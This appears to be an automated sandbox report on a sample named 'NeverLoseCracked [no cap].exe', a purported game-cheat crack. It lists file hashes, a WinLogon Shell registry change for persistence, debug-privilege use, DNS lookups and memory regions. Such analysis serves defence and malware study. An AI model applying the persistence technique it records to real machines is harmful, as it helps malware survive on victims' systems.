SHA512 ab9b9a90177bcee2172e55d3dd209c3a11402fc36f825987e499bc3e9ad3b4d91bf7ea1736ad20c94bbca4eee22ff741bacf7a368f7be277593d919591e8b581

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 778ca3ed38e51e5d4967cd21efbdd007
SHA1 06e62821512a5b73931e237e35501f7722f0dbf4
SHA256 b7e1bfadb8d9c061f17a7234df012df7842ab1aa8fb6f9579fa3f0a3b4a75bc0
SHA512 5f6f02099ca8079305fb7e7f43ae4344d522271fe30379c0854d6a81b7d8adf408a50a4b799b5f52e6ed162ba6ce7fe97e24a2b9719df780e75683d3aa103d09

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

MD5 d4573f829b4f14307ba330cb30e84a4f
SHA1 914f31667c202743a1f761d6e5d97af867692822
SHA256 153998221610cf51fb52561639d94a86a7e027225571296ce96aa1d716916828
SHA512 a2df48fdd73f7615c370c063e175d76f35c3e73e6c7b06f8c96c222b0810ac0694044084dc824f57c4a67dc783fcf92412c89927abb358f2c4af260bfca737bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 0b2cb411df0c267c83abb83802dee87a
SHA1 cc65aec20bacb8bee07f10981658dec751b6b270
SHA256 77177367eae44aa70ec5fd107ccd6c589092ff93e9166b9bdd19a0477d2d2e42
SHA512 17fb4be12d013d7fc19d6e26a6e25131e88ce6272fec1bce23a94d6a6a3e309ea9dbad75fe91b80862fc014de1687016b3418215d962836bfd0d536c4f95b22c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 6446a11e503a678306ea9653aeffb08e
SHA1 b774ce5a88202a719e6a7be53bf3373473de31c7
SHA256 680d8582801792b0578b94bacf2a68c231bf4f970d00b8f92fa85e32c6ce94a1
SHA512 3f282eebb712ab6aee8d47222af9ad05cee7b292a0e463cab8ab5999db5a727dba80aab6e98aaf2f8d4c3932daaeff08ec44562287b786868d631d4b295de6cc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

MD5 8eff0b8045fd1959e117f85654ae7770
SHA1 227fee13ceb7c410b5c0bb8000258b6643cb6255
SHA256 89978e658e840b927dddb5cb3a835c7d8526ece79933bd9f3096b301fe1a8571
SHA512 2e4fb65caab06f02e341e9ba4fb217d682338881daba3518a0df8df724e0496e1af613db8e2f65b42b9e82703ba58916b5f5abb68c807c78a88577030a6c2058

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

MD5 0ceb818a26c32ccc800255c207c0afac
SHA1 ecca1bec3f2eb5c5c444eb86a9835ed4ffd9766e
SHA256 b8f195a536a61525543f3a65ec2d11ec9cc27c2c18b74def7ac218ef4fa41124
SHA512 8f89398cca104d6fe7b4c3e7d86cdb6b401f1368ee711b7650c19a688dc616c36093aed2bf0a4dd27a269cfd6946bd3b4a435d4f9d6f2f48eab8ceb3803695f7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 4165e15c0e8e7f5313aba85f1fa09233
SHA1 15566d6448757cbbf77ba502d1451b9751a9de0d
SHA256 cb66c6e5653cc31df85d918477a83b8ce0e896f5bdd5878a09d00810eaf9ec90
SHA512 ee14c5f30f35b0e40d8fa082fbbbba642943d1c1039f7bf8c37ef83fedd15495946150074a1c4b603e581be3029ef9fa1e78e235286aaf276899823ce025bc19

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 f737d4b852a8f4d2a41e8f9033e13aaa
SHA1 f1f7eadf66cfbd6963697d102b4bb1e8de28da2d
SHA256 2aa331f40ecbcae2cddc8cd73e836b5c2fdcfa9e03e49a6ec55e7e2d6673197a
SHA512 b567703c94d991d71b692808eba4e7c593a7eaff3e8e31f3e2bb397d36d47b3baab4168339beb15df3ca3f6004c88ecbca863c6fe286dcfee4355181c0c904a2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a420b70660f767d4cfb84a5e14af05b1
SHA1 b463f89de05a5c7c6579d420c7ec8d93ca1abe69
SHA256 b61994943f15e4c836c51bfec793255bb9f51ccfe856c51b125ab814acf37bbe
SHA512 cdc2a404a53625e8576dbee4b8c53dc6d492f9db97af98d2c81c1b6785bf9307684de49c7c99e0135818207743cfe683b756bc58d8199f2b541072c2640aad91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 3ae1995c4386a237a76b4b2e130ea792
SHA1 4baa513a767c8b6fbfc3408426e3b31cebe4b506
SHA256 cf9af2225e3587f66e810b188efb087dbe0209b22e15b3f89f8f42a6085d8630
SHA512 c3ec4fb27240a3785693595af47eb9d8d3495e70db17ce88e6ed8bee5e328f061cc5c678402bdbe2dc138ca0c008fa01f28322d9cadeff08bb7f51b28f4d66dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 8fedad582ed732728070d4754f196d07
SHA1 b94051359a5c4deee990544c25129c78842c6e26
SHA256 74d56ad209629b7d461ca2a689440333f48213a55bb8892c2b3a473e6110c261
SHA512 0b1dc36cf4e9193070033827b00edeaf825bebdf4930ebbcff2629620e7431aae282f0b8f669b5ade4bfaea2722bc2f486842629289a28ba6bd7da5f55a29a0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\b1370169-d0c7-40c2-8510-a4b7d21e3e0f\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5276683083725710cffd6f516c3f9d07
SHA1 9eeb63b267a5f1490e978804f29fcb08d0c47052
SHA256 cbe0a5bd978f914774439bb144b739a0354db23d9f5681b3f990c285b23c8e13
SHA512 4ec6ed0411bae2173abfbc0d3e9f5ce8c74fe7612ed06c03868d8a6fa09b54f2c591f9bb0910944b511da7d2cff1a134a31fa4fba96e6c002bdc9e5253570daa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586944.TMP

MD5 2658df40cb0d6a012b1386f99d759582
SHA1 b539e78b9a5a6dca515e7133f626c4242e43e1cf
SHA256 2178021ef2bb4aacb64a587f33385cd5743384fff7e6005eebadccc4bb96c637
SHA512 f741a9d0e5a5ccce75ce7c56ada713ae2e2e18a4f7262a7486cbae5eeb287ab88e9b324efe62edb5b7f376f004c067e7bd8be19f67f7a0e8155cc97a7cb572f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

MD5 115c2d84727b41da5e9b4394887a8c40
SHA1 44f495a7f32620e51acca2e78f7e0615cb305781
SHA256 ae0e442895406e9922237108496c2cd60f4947649a826463e2da9860b5c25dd6
SHA512 00402945111722b041f317b082b7103bcc470c2112d86847eac44674053fc0642c5df72015dcb57c65c4ffabb7b03ece7e5f889190f09a45cef1f3e35f830f45

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

MD5 2d0cbcd956062756b83ea9217d94f686
SHA1 aedc241a33897a78f90830ee9293a7c0fd274e0e
SHA256 4670bfac0aeaec7193ce6e3f3de25773077a438da5f7098844bf91f8184c65b2
SHA512 92edce017aaf90e51811d8d3522cc278110e35fed457ea982a3d3e560a42970d6692a1a8963d11f3ba90253a1a0e222d8818b984e3ff31f46d0cdd6e0d013124

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 c83e4437a53d7f849f9d32df3d6b68f3
SHA1 fabea5ad92ed3e2431659b02e7624df30d0c6bbc
SHA256 d9bada3a44bb2ffa66dec5cc781cafc9ef17ed876cd9b0c5f7ef18228b63cebb
SHA512 c2ca1630f7229dd2dec37e0722f769dd94fd115eefa8eeba40f9bb09e4fdab7cc7d15f3deea23f50911feae22bae96341a5baca20b59c7982caf7a91a51e152f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

MD5 350fef14b9432c8888714f9d69ba79fb
SHA1 f02876195e3b3628384124d63cbcb3606a06996d
SHA256 dbb362d29b9b4111e7722bae880e8a79ef8efe96db4cdf7869195f5cd0066fc5
SHA512 8fab4f3151a81a2cf0465aaf245d507da97c230eeb86dd6e9cee798e4d8d953aedb2e7e4cc004fdc8a5f7e8af0ded27aeefb4c626ad61c95f38572e13d49d419

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 9a95465d3764f96b7999c7c0f30f87a6
SHA1 5d2f08cb28acc8716afc6406beec43120b5737df
SHA256 425485dac92e5a7f24fbe3c728977bb245cd9425ddfcfe51352eebbd8bd2c0fb
SHA512 e80de30197ce9460abac1f3831a85da660aa382afbebd41524b448dc0e092c0270e5758c6b5e67992d3129ac6e3bf55f5a01316c0515b241a4aa88044af59913

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5874dd.TMP

MD5 0135d78fce3d44a691676f131d6c783e
SHA1 b11fd6872f78f64c7193f268b3700d9b0499110f
SHA256 1eb505492c8da7df3aaa0d4a33f25748fc5c4268c5839f22acbff4e1cdff016a
SHA512 6e5d76f9578f619dfce4eeea3cd5446c0c8abeb8c4f520242e5db2e0730c39624f9251bccf19845ad945a9cdd860576e28e5f42b8ab66ee27be98a3625491062

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 de23825bcf93469db88e349ba1637e3e
SHA1 ee80919ae566685627a9b76a7c4cb92ffc8e4a55
SHA256 872810ab46f70acc65014fa120fad3b0ff971eb6e4472b412352bd399b1058bb
SHA512 05476f557daaac9808b4d94112a8c65c5660a159b4f0514352f5a44ea3ef1a79b53293fc5776d6270161bf8d9c57b3c654db6fdfa842029068eb9002fb1f6b1c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c4df5f49-38fe-4954-b9fa-f87f18695d62\index-dir\the-real-index~RFe589efa.TMP

MD5 e2159f18f55a9cae94042f1ea3d1a564
SHA1 95722cd3ba9afc01a284c8e80508b7b2fd54512a
SHA256 469d223fe09e85c03c4549e3cd3c28d80ae8f08239f4ce297354747615a44ad0
SHA512 df4adc70e020e4df5bf1fb96f46ea6394ce4d511e5b730fbf02f6f161ffca37c3f4819d7d4f8e3bdc731204238198ff1e82e89aa671040d57abbc6c52c183329

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c4df5f49-38fe-4954-b9fa-f87f18695d62\index-dir\the-real-index

MD5 8a4e549a31582f09befd2f8b7a8df230
SHA1 5c12d1f2f74fde8db1dd4cfb684e512f1dcb58f7
SHA256 f2c9f2512bc59455cb6b90245a26fa7039e7abcfc4be6fb2dddc412cef31616b
SHA512 1b90f0e6b2ca52012953392747c745406fb442e8c5d260db19992af299432fa31b67625244ab53cc9c29631c8c2aadf1c22f6fd55bded2c7e46673b116f06b8e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9a30aac35eb0d91efb62c1f8a2f4173d
SHA1 0e84d7c62ba8238eb341ca04aebe0f6536348a6f
SHA256 17e8facd281f7e5d7e6c3c63930b3dc7217124025af23836b1d4ba69f4cf7a8f
SHA512 490921893e788a2238e091b9a0cbbc7a0d122a10c60db5c4cdb2073e67c7d9e0a0d5730279a5f4f3d93a0b5f795cebc6c81b8614752fb231c45eb57c3d48ae51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 39a1b420fac77d5731e5b0409102a646
SHA1 97a47dd7cbd412aba6ee2e3408b02303355d7665
SHA256 bf0145105c4ac5e9f88a9948f37ac3c7255fcab01804efc035eb35f78ed047a2
SHA512 11871951eef99fc89ae1f869fe901700e287441c856d45a170ca66688e713e5d7305e99810e85671fb96437c518c9e574a01cc177647e87cc56528bfbcab111f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 881e4a72996a064a7d71c441b1eee402
SHA1 a8dc603a18f37888f3b493d1a513857e8ba5ef1f
SHA256 8f7094e61107175d67d6f6037fce5a632a099f50be61d0b3fd5d9b00f070c911
SHA512 eed88d2d8cd525cddee6d56d91d40ec4fb834ef79a9dc8ae5ffd0e78a9cb91fe91401cbcd1b00c79b6264b3e31d8b52ad38be6dc9d8e1ce215697643b7a256a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a464bca15b2f4267055632132c58febc
SHA1 be1508b964f290e5df73e2fb0b7c0cf046ac804b
SHA256 020307af1c6aa776d4af6f344ac714ee07772f51c904c59eb5d7739b021b67b1
SHA512 7fe8d5253df558c9ea8a99aff097c34adb39047ae94aeb64a934346b9853fccda6f9791c5b7193cac0ac0c5999e0f82bfda92a6ae462ae3431904c41650957e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\9c39b2dd-5d50-4166-8209-1a020eb2bf0a.tmp

MD5 e57530a3dd0cb56ec3f6d8a9abf403eb
SHA1 52181d3897bf8583afb82229a61a0ae5cb82dd34
SHA256 fde8edc4c5ab83afb2a27a040d812c4df65f32063f1d846ee325ddb772dd4958
SHA512 7bace1f5144c5ede18fa1f7cfabe35161b0fcb8bc78744896a151cc95b96bd0b7c016141a8c04867b0839ec0c55a45d4e80f0301bdd432cace8cdd1364406b17

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bb8b8f5c5dd3b2b1dafc7efe811bc1ce
SHA1 912c3f6e385b693878645015a71990c1bf9de9d9
SHA256 696c08e148056468dff657176291c66ca8de508af34e30b1d75fdab96ac753e5
SHA512 445cf8f180e67fc58797e8afaf05abfbd0ecf9639fff96634dd776a905dcc380d989bd1fbb71b472b627348ab9c213625a7bcd388c2e4bb6a26b138de9bcf359

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e2039d4e89f17fabb6a619fd1b95f7de
SHA1 fcc2f3232263513fd61ac9d12a7d336e615da8cb
SHA256 06303acaac3e1200c78c70c441acee055f7511840370f9e4c548c4efb42eb622
SHA512 29211f7be32c181552deacce9e7ca49ebd0545a23c4f99d916da818ef071ad5f9aaadaf1f3b292d3384e59a53b44f8edbf07cb3a83c149729dfc524c7a9bfb2e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2ce3541e27f36190d836efeac6c3555b
SHA1 0936a8fa8335a7c2ea9b7c03ed49e5f4c2810db7
SHA256 095c54d5e96be6f6fa7765ea0abe5609e36ad2477f489dde0a3141c0089b3510
SHA512 b7fdd821f0add93c9d5fd696709d7b361d3783c0139ef4a70192c629fe90f68473ed5cd2872e9f412b73317e7b82352cd9825d3dda92e1b3a0a43f3d9f50e36f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

MD5 7c2224075fd41741e27aab8e01cc338a
SHA1 61ab9ba861743b87f8af0c55e977aa1c653f8d73
SHA256 efaecafb3b690ff5bddf38ffb089a715f083e311ae55761697fcd3ba69b5a141
SHA512 d6dbda96d49ff4b36d6906dcf001e7ffbbd953e06a347abd5d3db8784feda2d134b875f7612611061628ba175656fcb6da378e8bd06764a287add3e64e33ce82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

MD5 7680465c99b9bbd9eb5e3055a95ff481
SHA1 4f035af69ca6076226746c23e900846846dce364
SHA256 b53b1d67494e1a4c85056d2bbd233fb9241dd02d88261f72aacf17584f0731e1
SHA512 3c78423f29234a1bc867a73f3c8ddb792869fdb388537867a8d78e68d545386c6cd92891f05221194113ddbc822532184d0763ec329db396c7d41c4f59d447d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

MD5 c63acd09d7abf05d6087981958d3349d
SHA1 6a654ec747409592581ec6fdf5594a6e516846c5
SHA256 1ba6177f62935e6623f960004b38e76c47260fc47708006b9c5a9aa9c2aa4001
SHA512 e5e19cda45283496c4dcf8878d75fffb345431c6688042380040e9382be194ff2f2951288429bb1002df0fa9be77f4930ede6fa74c861f1916f8a75bf72cf64e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

MD5 329171b680f802225de8e319988de67a
SHA1 39b51c4bf371089bf2223f41f731dc3442b991e9
SHA256 5f785bd507da25f5698da1ae9281950ec415a560cb8058c4bd282582cd17014c
SHA512 7238601e40e049a3d0825bfc99633f5538c6929dbf0f14c848819d763d0e318d862ce342509555752305dbd64d2889d7bc287670166f5cf35564b785ea8dfa3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

MD5 dea2845a168742c75f21eb3eecfd073b
SHA1 5317695bc387b1322068fd6a6b93196651865a12
SHA256 4812d8c0819d7375a860894444a505167bd45b212f6981faff32b0ad7712c06d
SHA512 6c8d9413a26bc75cd0219d0da8be77fbb2d8869d3fbec5ef3f922b44281da9878aa172d322629b67c9b758fc253a98aacfb18ffdaf5e2cbbd1e5cba55a05930d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

MD5 ea72a4e3b1d503709bf4894acc0d993b
SHA1 5dc1085aa6602623ba36d129cd14eaa2153eebb8
SHA256 a748205e9bd601df0b0beea943a4f3c9cf1ba5cddc17a7b8d72119057b0407e7
SHA512 72b1bb7d1739515be17253714ab74a3b8f8850b72dc5d391bea2caada0ed2bace4c5fe799ef4914f68ed2e817b74ba3d3aa1f31e1bfaef1618c23d02c7f1aa18

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

MD5 04f4c51c1b1ae4347d3ef9e63dd650f8
SHA1 87e0f582937e3aa332e9fe12b9bb0b8b45bfc418
SHA256 590d1c3dd1db6db4deb55d98a95fd11ed040d8ca1775f406558b66441b50e6ec
SHA512 9c271842736e0cfb9198bcc29003fe93b319984fa65ccc571fc5bbfbbc7165fe89effc76f9a2fa4d052bc44633badc2dc8bc73bb3b68022a4d1c626e386c23e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

MD5 6381aee94589eb62197302f2dcaceead
SHA1 f9c10d1b729d5958b698507afdc27fcdba8dbf78
SHA256 95aa54df31d1f8fc7fdbab297730882029b052eb9e79898ce4feaa6f3d6d52fe
SHA512 c169b380f85a532b8c84c2bf4fc910d103294d7dc060d1d10d8f11f004726bc3e81c8b611ca3d0311beb8773de1f89c28b20e4fce832f9f8f60baa53ecb754d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

MD5 5571d8719004cb53a65451e857eefa30
SHA1 99c8a889a8e6c14366b32ea5ab714d0005263a5c
SHA256 81a63d0ecbe981107ca5f6ac4138803453f1b20d05b741e67ee4bef0641552d2
SHA512 1d862137deb4cd270ec8dce26f44a5834aae9f3f2c9dd2e496ec1beb1aa430109b2bda5995a5c314fcac5fa6fb4e64e0b1c7cbc502cf23df9abf6410f9051621

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

MD5 2b175f9be1bc413666c2cb94b7b82aa6
SHA1 296e059cc0330c35c1a6bea8192c835894a63178
SHA256 0d7de85a8632a76524cf886ae28005a4e8b1c8f06cb19b30e0f51375a27cc0e9
SHA512 101552f23d0f961e17ca887724da8011f5dab7a1324ebb775e5d6c1e41718f4f2d6bec317aa9986fc8b28d8064adb0cde9fce827029da55762ed0558acae5606

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 214f75e42aa5cfca07257cbf8c64e83c
SHA1 ba4bbe71d4ab266bc145305217cdf86a7777137f
SHA256 a6760631fecfe59ed152aeb2c51fdcb515ac00cd4755449016b5b34813735d00
SHA512 e8d896c8c3509941fbce96e2847838a520b3bc8d94348b1121840a1a2a45328be939238423a03cdfb7823cf128eec3190de8b4c1924553d603ef02fa856217e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

MD5 7fda4c62c1bdeae7a08e6fd438104bac
SHA1 b1f626e78f5f6d7be993303a49eb81f0fa4ce57c
SHA256 4dbd328e347e890a801d51f9a5f8d38a3efd51ec34c0aa22cc83d0a95d6d9d71
SHA512 c4a36a3c1ff23023533dff103a108844b7cfe4e793aba0b1b5576431e77dd6e9edf29fad68132577ad6ad55ca7a011a38723da2fa15d9071d2c6ba4e02d1dadc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5f056791b62579ef960de7325552211e
SHA1 10569ac2c43e7dc05b47b736e151a42382b1f409
SHA256 7c000ed3137907eed223ca526b66f1e2fad96239de40a9ed878588b16b4f0d93
SHA512 a05230d8530965dafbf6ddfb8bd1079a826861ff3cd36d633df31219491dbd72db16444563b6e47b1f8196cb9379cbfda63e137a330edf50902b9844d8b465f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002b

MD5 a5cc79fbd666432c461daec09604f082
SHA1 9a3df93d85aca657c5c8b60f9b4063128319647e
SHA256 9a7f91177674363a59d898f41192d993f0dab2ce2c93a180b6d1042ea4b9e279
SHA512 f93ebbb16738cae18477a0bd833098abee3a77880b8623ae2a462ee8e209487045121700e013dd0da1c7c3f5c9f24a56f02a5cba837df4ac1f33c9f6e3522c62

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 4bb71581a47e597283a0da0f6bef0eaf
SHA1 536ece5dad210a9ad160eb1243f836ab18482410
SHA256 045771bfcf6c64cb008723fac614aee762de1c3b0f8f2e9895a37c788cd33966
SHA512 e481ebc6878a88a0cadc0123e5fc56ebfd549cfd76df69ef6d976c9015605b7d75092321f7f49d8c61cf611f3f9a39c96bfee995b7f9be3461f44e5379b79d19

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

MD5 f730bff0cf8edaeb2843488eb25f2871
SHA1 f911d18a07b3dac9b6cbb8562e4589fb034bc31c
SHA256 e21091eeb35a537a27bdef9bfa0952083e2cc4bf8fd622b8bb5d4757f0eac12f
SHA512 6f5b0a66135b227f36cbbf4f0a2c5af95887a92ad4b59937cd1168d35fefa8860b2a08364f60f788b52c19b49bef3282edc70ec63d7b5b29a8d6909d3aea0e60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a865f2e2c267300be20c5eb310cf43bd
SHA1 4b44d7e62a9f4def96b6d1675fc6a107e35ee55b
SHA256 08d8304c1cbf6dc78b3e0f4c59ebb1289872c7731b6c9cc050e7072adacdabaa
SHA512 fb7181a0a6bdd8dc8bd292765107f799ec2806aa225e2ef6699ef18a13a64a6362ad27ca6bc5c67f8ca3064a10bd50cbf88331c1529f461680031b478ee65cfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f123a0719bb2ba08806a61fb9ce3cbdd
SHA1 ea0c5e5071f125e0c8508449a0bb840094cd6d31
SHA256 fa8a890585b7b08ccf9c27dc0399964b780072c7a1196b25f614bff4d1f6defe
SHA512 54fb461c5e8058ea25d88a194f44631d9413bfec21f45bc29fcce2a646f4cba7b282526cf7e599605f632d3e866601587f5d23c973df40f0db5027d9128b0c63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d8873cbac3efe2a5036d6858af30c688
SHA1 3fad1362ca9842c8065842903e92a34caf1e589e
SHA256 6fe461cf28ee7a69910b21a299b7ed081bcb3bf99cacb6a591a9d77096771cbd
SHA512 2a4bee6d8bc4db460e0f8180e1442cf63c7dcd77c54951f75e7ca5ee5de88ac14874069ac4365e7c152cbc4809c87e9859505efa80d3a163f136723f667fcaba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ed5f4fcff84187b4d0cfcacc3ae77a1d
SHA1 6cbbcbd40b4796fcb171c23282e109b7c0a13e0e
SHA256 b7b832bc2cd853fa3111e32975bfee5abd3dd35a1378dc7d42e72c6c3bb94269
SHA512 2dc372fa2e761cc7dc8927779fefd5553871aa93027e86d5b688c427a9bbcd01c81fe2008de80cbf7519f9a1437bcd24f8e613f363b39efc47cd4df33e8a9226

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 87c2b09a983584b04a63f3ff44064d64
SHA1 8796d5ef1ad1196309ef582cecef3ab95db27043
SHA256 d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0
SHA512 df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

MD5 e383ef862f4c7f2a0c8914815681208d
SHA1 e280c3d5ac7a4168711d8ffb5943c86fe04b9d04
SHA256 37cd92c2c53e7a916e02f3c90a58ecc8510dd2663b6c8ec44407765802c9a90e
SHA512 e665e11c24e50520da6b83f877fa45fe94ed6eb502c4f9bbbbdc2fe539b54111d0a7c442c5828b1f58d000e3f90f33ab600dc9f120e4eee8748931378b265c48

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c4df5f49-38fe-4954-b9fa-f87f18695d62\index-dir\the-real-index

MD5 ec3bdf60fc94a1f5e5991bc03ca626a3
SHA1 70f31a31408c62799c315e910e7015efdaa5b944
SHA256 85065ed21f4ce54eac9f5d81c7294564ed04b1564fe723cc94f3669022cccc9e
SHA512 7a09579d085073a106f7b81ccee5db99ba4fddd235a61e9b2ac446dab9ac4452f9940798eba7a01b85073e915737791d69818ce2fc40a53e402f132102a26900

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 55baacecb7ed96337ccd5cdfd425cfb8
SHA1 7a40d743a398da8d9a82552add7cf8ed18eced1a
SHA256 a12eb809f22787c2ea9579cefe9fef3678b68e03e921b135a80447da61efd1d3
SHA512 6f7e19c178ec69cdee110d61d4ac0f4cc086ef7ee014709348a267952f5085a54f4cd5c16fc088a7ba231d0ca3381136e7d58ab6ce44ab0a32807cf4d6fb5431

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-06 21:36

Reported

2024-10-06 21:39

Platform

win10v2004-20240802-en

Max time kernel

95s

Max time network

96s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCracked [no cap].exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/2868-0-0x00007FFCCA6B3000-0x00007FFCCA6B5000-memory.dmp

memory/2868-1-0x00000142C7E00000-0x00000142C7E22000-memory.dmp

memory/2868-2-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

memory/2868-5-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

memory/2868-6-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

memory/2868-7-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

memory/2868-81-0x00007FFCCA6B3000-0x00007FFCCA6B5000-memory.dmp

memory/2868-82-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

